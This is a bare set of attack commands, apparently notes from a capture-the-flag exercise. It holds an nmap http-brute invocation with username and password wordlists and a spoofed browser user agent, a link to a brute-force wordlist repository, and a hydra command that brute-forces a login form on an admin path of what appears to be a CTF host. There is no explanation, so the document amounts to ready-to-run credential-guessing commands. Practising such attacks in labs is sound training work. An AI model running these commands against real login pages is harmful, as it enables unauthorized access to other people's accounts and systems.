sudo nmap -p443 -vvv --script http-brute yourhost.com --script-args http-brute.hostname=yourhost.com,http-brute.path=/,userdb=usernames.txt,passdb=7-more-passwords.txt,http-brute.method=GET,http.useragent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'
https://github.com/duyet/bruteforce-database.git
hydra -V -L cirt-default-usernames.txt -P xato-net-10-million-passwords-1000.txt -o found.txt -s 1337 manuel-blog.pmi-ctf.securitum.net http-post-form '/admin-8591a56c48eea99866a2302ac9a0127c/:username=^USER^&password=^PASS^:F=Invalid credentials'